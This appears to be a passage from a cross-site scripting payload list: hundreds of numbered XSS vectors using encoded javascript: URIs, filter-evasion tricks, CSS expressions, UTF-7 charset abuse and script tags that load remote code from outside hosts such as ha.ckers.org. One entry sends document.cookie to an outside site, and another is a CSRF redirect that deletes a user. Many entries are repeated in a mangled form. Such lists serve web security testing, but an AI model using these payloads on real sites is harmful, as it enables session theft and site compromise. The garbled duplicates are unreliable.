  1049. &lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt;
  1050. &lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
  1051. &lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
  1052. &lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
  1053. &lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt;
  1054. &lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
  1055. &lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-
  1056. \&quot;;alert(&apos;XSS&apos;);//
  1057. &lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;
  1058. &lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt;
  1059. &lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
  1060. &lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
  1061. &lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt;
  1062. &lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt;
  1063. &lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D;
  1064. perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out
  1065. perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out
  1066. &lt;IMG SRC=&quot; &amp;#14; javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1067. &lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1068. &lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;
  1069. &lt;SCRIPT SRC=http://ha.ckers.org/xss.js
  1070. &lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
  1071. &lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;
  1072. &lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;
  1073. &lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;
  1074. &lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;
  1075. &lt;SCRIPT&gt;a=/XSS/
  1076. &lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1077. &lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1078. &lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1079. &lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1080. &lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1081. &lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1082. &lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
  1083. &lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;
  1084. &lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;
  1085. &lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;
  1086. &lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;
  1087. &lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;
  1088. &lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;
  1089. &lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;
  1090. &lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;
  1091. &lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;
  1092. &lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;
  1093. &lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;
  1094. &lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;
  1095. &lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;
  1096. &lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;
  1097. <script>document.vulnerable=true;</script>
  1098. <img SRC="jav ascript:document.vulnerable=true;">
  1099. <img SRC="javascript:document.vulnerable=true;">
  1100. <img SRC=" &#14; javascript:document.vulnerable=true;">
  1101. <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
  1102. <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
  1103. <script <B>document.vulnerable=true;</script>
  1104. <img SRC="javascript:document.vulnerable=true;"
  1105. <iframe src="javascript:document.vulnerable=true; <
  1106. <script>a=/XSS/\ndocument.vulnerable=true;</script>
  1107. \";document.vulnerable=true;;//
  1108. </title><SCRIPT>document.vulnerable=true;</script>
  1109. <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
  1110. <body BACKGROUND="javascript:document.vulnerable=true;">
  1111. <body ONLOAD=document.vulnerable=true;>
  1112. <img DYNSRC="javascript:document.vulnerable=true;">
  1113. <img LOWSRC="javascript:document.vulnerable=true;">
  1114. <bgsound SRC="javascript:document.vulnerable=true;">
  1115. <br SIZE="&{document.vulnerable=true}">
  1116. <LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
  1117. <link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
  1118. <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
  1119. <img SRC='vbscript:document.vulnerable=true;'>
  1120. 1script3document.vulnerable=true;1/script3
  1121. <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
  1122. <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
  1123. <IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
  1124. <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
  1125. <table BACKGROUND="javascript:document.vulnerable=true;">
  1126. <table><TD BACKGROUND="javascript:document.vulnerable=true;">
  1127. <div STYLE="background-image: url(javascript:document.vulnerable=true;)">
  1128. <div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)">
  1129. <div STYLE="width: expression(document.vulnerable=true);">
  1130. <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
  1131. <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
  1132. <XSS STYLE="xss:expression(document.vulnerable=true)">
  1133. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
  1134. <style TYPE="text/javascript">document.vulnerable=true;</style>
  1135. <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>
  1136. <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>
  1137. <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
  1138. <base HREF="javascript:document.vulnerable=true;//">
  1139. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
  1140. <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
  1141. <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>
  1142. <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
  1143. <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
  1144. <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
  1145. <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
  1146. <a href="javascript#document.vulnerable=true;">
  1147. <div onmouseover="document.vulnerable=true;">
  1148. <img src="javascript:document.vulnerable=true;">
  1149. <img dynsrc="javascript:document.vulnerable=true;">
  1150. <input type="image" dynsrc="javascript:document.vulnerable=true;">
  1151. <bgsound src="javascript:document.vulnerable=true;">
  1152. &<script>document.vulnerable=true;</script>
  1153. &{document.vulnerable=true;};
  1154. <img src=&{document.vulnerable=true;};>
  1155. <link rel="stylesheet" href="javascript:document.vulnerable=true;">
  1156. <iframe src="vbscript:document.vulnerable=true;">
  1157. <img src="mocha:document.vulnerable=true;">
  1158. <img src="livescript:document.vulnerable=true;">
  1159. <a href="about:<script>document.vulnerable=true;</script>">
  1160. <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
  1161. <body onload="document.vulnerable=true;">
  1162. <div style="background-image: url(javascript:document.vulnerable=true;);">
  1163. <div style="behaviour: url([link to code]);">
  1164. <div style="binding: url([link to code]);">
  1165. <div style="width: expression(document.vulnerable=true;);">
  1166. <style type="text/javascript">document.vulnerable=true;</style>
  1167. <object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
  1168. <style><!--</style><script>document.vulnerable=true;//--></script>
  1169. <<script>document.vulnerable=true;</script>
  1170. <![<!--]]<script>document.vulnerable=true;//--></script>
  1171. <!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
  1172. <img src="blah"onmouseover="document.vulnerable=true;">
  1173. <img src="blah>" onmouseover="document.vulnerable=true;">
  1174. <xml src="javascript:document.vulnerable=true;">
  1175. <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
  1176. <div datafld="b" dataformatas="html" datasrc="#X"></div>
  1177. [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
  1178. <style>@import'http://www.securitycompass.com/xss.css';</style>
  1179. <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
  1180. <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
  1181. <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
  1182. <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
  1183. <script SRC="http://www.securitycompass.com/xss.jpg"></script>
  1184. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
  1185. <script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
  1186. <script =">" SRC="http://www.securitycompass.com/xss.js"></script>
  1187. <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
  1188. <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
  1189. <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
  1190. <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
  1191. <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
  1192. <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
  1193. &quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;
  1194. &lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
  1195. &lt;/br style=a:expression(alert())&gt;
  1196. &lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;
  1197. &lt;br size=\&quot;&amp;{alert(&#039;XSS&#039;)}\&quot;&gt;
  1198. perl -e &#039;print \&quot;&lt;IMG SRC=java\0script:alert(\&quot;XSS\&quot;)&gt;\&quot;;&#039; &gt; out
  1199. perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCR\0IPT&gt;\&quot;;&#039; &gt; out
  1200. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1201. <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
  1202. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1203. <~/XSS STYLE=xss:expression(alert('XSS'))>
  1204. "><script>alert('XSS')</script>
  1205. </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1206. XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1207. XSS STYLE=xss:e/**/xpression(alert('XSS'))>
  1208. </XSS STYLE=xss:expression(alert('XSS'))>
  1209. ';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
  1210. ';';;!--";<;XSS>;=&;{()}
  1211. <;SCRIPT>;alert(';XSS';)<;/SCRIPT>;
  1212. <;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
  1213. <;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
  1214. <;BASE HREF=";javascript:alert(';XSS';);//";>;
  1215. <;BGSOUND SRC=";javascript:alert(';XSS';);";>;
  1216. <;BODY BACKGROUND=";javascript:alert(';XSS';);";>;
  1217. <;BODY ONLOAD=alert(';XSS';)>;
  1218. <;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>;
  1219. <;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>;
  1220. <;DIV STYLE=";width: expression(alert(';XSS';));";>;
  1221. <;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>;
  1222. <;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>;
  1223. <;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>;
  1224. <;IMG SRC=";javascript:alert(';XSS';);";>;
  1225. <;IMG SRC=javascript:alert(';XSS';)>;
  1226. <;IMG DYNSRC=";javascript:alert(';XSS';);";>;
  1227. <;IMG LOWSRC=";javascript:alert(';XSS';);";>;
  1228. <;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;
  1229. Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser
  1230. exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);
  1231. <;STYLE>;li {list-style-image: url(";javascript:alert(&#39;XSS&#39;)";);}<;/STYLE>;<;UL>;<;LI>;XSS
  1232. <;IMG SRC=';vbscript:msgbox(";XSS";)';>;
  1233. <;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;
  1234. <;IMG SRC=";livescript:[code]";>;
  1235. %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
  1236. <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>;
  1237. <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>;
  1238. <;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>;
  1239. <;IMG SRC=";mocha:[code]";>;
  1240. <;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
  1241. <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;
  1242. <;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>;
  1243. a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;&#10;eval(a+b+c+d);
  1244. <;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>;
  1245. <;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>;
  1246. <;XSS STYLE=";xss:expression(alert(';XSS';))";>;
  1247. <;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
  1248. <;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>;
  1249. <;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>;
  1250. <;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>;
  1251. <;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;
  1252. <;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>;
  1253. <;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;
  1254. <;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>;
  1255. <;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>;
  1256. <;HTML xmlns:xss>;
  1257. <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>;
  1258. <;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>;
  1259. <;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;
  1260. <;HTML>;<;BODY>;
  1261. <;!--[if gte IE 4]>;
  1262. <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>;
  1263. <;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>;
  1264. <;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;
  1265. <;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;
  1266. <;? echo(';<;SCR)';;
  1267. <;BR SIZE=";&;{alert(';XSS';)}";>;
  1268. <;IMG SRC=JaVaScRiPt:alert(';XSS';)>;
  1269. <;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
  1270. <;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>;
  1271. <;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
  1272. <;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
  1273. <;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
  1274. <;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;
  1275. <;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
  1276. <;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-
  1277. \";;alert(';XSS';);//
  1278. <;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>;
  1279. <;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>;
  1280. <;IMG SRC=";jav&#x09;ascript:alert(';XSS';);";>;
  1281. <;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>;
  1282. <;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>;
  1283. <;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>;
  1284. <;IMG&#x0D;SRC&#x0D;=&#x0D;";&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;';&#x0D;X&#x0D;S&#x0D;S&#x0D;';&#x0D;)&#x0D;";&#x0D;>;&#x0D;
  1285. perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out
  1286. perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out
  1287. <;IMG SRC="; &;#14; javascript:alert(';XSS';);";>;
  1288. <;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1289. <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
  1290. <;SCRIPT SRC=http://ha.ckers.org/xss.js
  1291. <;SCRIPT SRC=//ha.ckers.org/.j>;
  1292. <;IMG SRC=";javascript:alert(';XSS';)";
  1293. <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
  1294. <;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>;
  1295. <;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>;
  1296. <;SCRIPT>;a=/XSS/
  1297. <;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1298. <;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1299. <;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1300. <;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1301. <;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1302. <;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1303. <;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  1304. <;A HREF=";http://66.102.7.147/";>;XSS<;/A>;
  1305. <;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;
  1306. <;A HREF=";http://1113982867/";>;XSS<;/A>;
  1307. <;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;
  1308. <;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>;
  1309. <;A HREF=";h&#x0A;tt&#09;p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>;
  1310. <;A HREF=";//www.google.com/";>;XSS<;/A>;
  1311. <;A HREF=";//google";>;XSS<;/A>;
  1312. <;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>;
  1313. <;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>;
  1314. <;A HREF=";http://google.com/";>;XSS<;/A>;
  1315. <;A HREF=";http://www.google.com./";>;XSS<;/A>;
  1316. <;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;
  1317. <;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;
  1318. <script>document.vulnerable=true;</script>
  1319. <img SRC="jav ascript:document.vulnerable=true;">
  1320. <img SRC="javascript:document.vulnerable=true;">
  1321. <img SRC=" &#14; javascript:document.vulnerable=true;">
  1322. <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
  1323. <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
  1324. <script <B>document.vulnerable=true;</script>
  1325. <img SRC="javascript:document.vulnerable=true;"
  1326. <iframe src="javascript:document.vulnerable=true; <
  1327. <script>a=/XSS/\ndocument.vulnerable=true;</script>
  1328. \";document.vulnerable=true;;//
  1329. </title><SCRIPT>document.vulnerable=true;</script>
  1330. <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
  1331. <body BACKGROUND="javascript:document.vulnerable=true;">
  1332. <body ONLOAD=document.vulnerable=true;>
  1333. <img DYNSRC="javascript:document.vulnerable=true;">
  1334. <img LOWSRC="javascript:document.vulnerable=true;">
  1335. <bgsound SRC="javascript:document.vulnerable=true;">
  1336. <br SIZE="&{document.vulnerable=true}">
  1337. <LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
  1338. <link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
  1339. <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
  1340. <img SRC='vbscript:document.vulnerable=true;'>
  1341. 1script3document.vulnerable=true;1/script3
  1342. <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
  1343. <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
  1344. <IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
  1345. <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
  1346. <table BACKGROUND="javascript:document.vulnerable=true;">
  1347. <table><TD BACKGROUND="javascript:document.vulnerable=true;">
  1348. <div STYLE="background-image: url(javascript:document.vulnerable=true;)">
  1349. <div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)">
  1350. <div STYLE="width: expression(document.vulnerable=true);">
  1351. <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
  1352. <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
  1353. <XSS STYLE="xss:expression(document.vulnerable=true)">
  1354. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
  1355. <style TYPE="text/javascript">document.vulnerable=true;</style>
  1356. <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>
  1357. <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>
  1358. <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
  1359. <base HREF="javascript:document.vulnerable=true;//">
  1360. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
  1361. <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
  1362. <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>
